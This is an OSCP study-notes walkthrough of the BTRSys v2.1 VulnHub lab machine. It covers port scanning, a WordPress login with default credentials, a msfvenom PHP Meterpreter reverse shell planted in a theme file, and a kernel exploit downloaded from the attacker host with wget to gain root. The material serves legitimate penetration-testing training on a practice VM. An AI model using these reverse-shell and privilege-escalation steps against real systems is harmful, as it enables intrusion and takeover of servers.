OSCP Learning Notes - Capstone(2)

BTRSys v2.1 Walkthrough

Preparation:

Download the BTRSys virtual machine from the following website:

https://www.vulnhub.com/entry/btrsys-v21,196/

1. Find the IP address of the BTRSys virtual machine.

netdiscover -r 10.0.0.0/24

OSCP Learning Notes - Capstone(2)

2. Perform the TCP/UDP scan using Nmap to find the potential vulnerabilities.

nmap -Pn -sS --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit -T4 -p1-65535 -oN /root/Delete/tcp1.txt 10.0.0.29

OSCP Learning Notes - Capstone(2)

nmap -nvv -Pn- -sSV -p 21,22,80 --version-intensity 9 -A -oN /root/Delete/tcp2.txt 10.0.0.29

OSCP Learning Notes - Capstone(2)

OSCP Learning Notes - Capstone(2)

nmap -Pn --top-ports 1000 -sU --stats-every 3m --max-retries 1 -T3 -oN /root/Delete/udp.txt 10.0.0.29

OSCP Learning Notes - Capstone(2)

3. Browse the target website(http://10.0.0.29) through Firefox.

OSCP Learning Notes - Capstone(2)

4. Try to scan the file structure of the target server using the tool Nikto.

nikto -h 10.0.0.29

OSCP Learning Notes - Capstone(2)

Browse the target website(http://10.0.0.29/robots.txt) through Firefox.

OSCP Learning Notes - Capstone(2)

Browse the target website(http://10.0.0.29/robots.txt) through Firefox.

OSCP Learning Notes - Capstone(2)

Try to login in the WordPress using default username/password(admin/admin).

OSCP Learning Notes - Capstone(2)

 Ahaaa! Login in the admin page successfully.

OSCP Learning Notes - Capstone(2)

 Go to the Edit Themes page.

OSCP Learning Notes - Capstone(2)

OSCP Learning Notes - Capstone(2)

 

5. List all the payload in Kali Linux

msfvenom -l payload

OSCP Learning Notes - Capstone(2)

Set the payload module and parameters.

msfvenom -p php/meterpreter/reverse_tcp lhost=10.0.0.26 lport=4444 -f raw

OSCP Learning Notes - Capstone(2)

Copy, Paste and upload the generated PHP exploit code to the Wordpress website.

OSCP Learning Notes - Capstone(2)

6. Start the Metasploit on the Kali Linux and choose the proper module. Then set the payload module and parameters.

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 10.0.0.26

OSCP Learning Notes - Capstone(2)

Browse the edited page(http://10.0.0.29/wordpress/wp-content/themes/twentyfourteen/404.php) through Firefox.

OSCP Learning Notes - Capstone(2)

So the communication between Kali Linux and BTRSys is established.

OSCP Learning Notes - Capstone(2)

Execute the command help to find the commands we can grab.

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   Migrate the server to another process
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    secure                    (Re)Negotiate TLV packet encryption on the session
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session.
    transport                 Change the current transport mechanism
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    chmod         Change the permissions of a file
    cp            Copy source to destination
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    portfwd       Forward a local port to a remote service


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getuid        Get the user that the server is running as
    kill          Terminate a process
    localtime     Displays the target system's local date and time
    pgrep         Filter processes by name
    pkill         Terminate processes by name
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS


Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          play an audio file on target system, nothing written on disk

 Find the Kernel version and current username of the BTRSys server.

sysinfo

getuid

OSCP Learning Notes - Capstone(2)

7. Try to find the vulnerabilities related to Linux ubuntu 4.4.0-62-generic in the Exploit Database. Then  download and copy the exploit code file to the folder /var/www/html.

https://www.exploit-db.com/exploits/41458

OSCP Learning Notes - Capstone(2)

Compile the source code and download the executable file to BTRSys server.

gcc -o exploit 41458.c

 OSCP Learning Notes - Capstone(2)

wget http://10.0.0.26/exploit

OSCP Learning Notes - Capstone(2)

 Ahaaa! We get the root privilege by executing the exploit file.

OSCP Learning Notes - Capstone(2)

 

上一篇:arm gcc


下一篇:react notes